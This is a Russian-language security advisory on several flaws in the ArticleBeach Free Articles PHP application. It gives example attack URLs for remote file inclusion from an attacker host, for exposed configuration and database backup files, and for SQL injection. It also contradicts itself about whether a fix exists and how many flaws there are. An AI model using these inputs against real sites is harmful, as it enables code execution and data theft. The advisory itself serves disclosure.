Множественные уязвимости в free articles
| Дата публикации: | 19.01.2006 |
| Дата изменения: | 05.04.2009 |
| Всего просмотров: | 7941 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Раскрытие важных данных Раскрытие системных данных Неавторизованное изменение данных Обход ограничений безопасности Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Free Articles |
| Уязвимые версии: ArticleBeach Free Articles
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре “page” сценария “index.php”. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://victim/index.php?page=http://attacker_site/ 2. Удаленный пользователь может просмотреть произвольные конфигурационныt файлы в каталоге “/includes”. Пример: http://victim/includes/config.inc 3. Программное обеспечение хранит резервные копии базы данных в каталоге “ /backup” в пределах корневой директории Web сервера. Удаленный пользователь может скачать резервную копию базы данных. Пример: http://victim/backup/article_art_22122005.sql 4. Уязвимость существует из-за недостаточной обработки входных данных в параметре “category_id” сценария “index.php”. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример: http://victim/index.php?pg=3&page=category&category_id=[SQL] URL производителя: www.articlebeach.com Решение: Способов устранения уязвимости не существует в настоящее время. Об уязвимости сообщил durito [NGH Group] - durito[at]mail[dot]ru |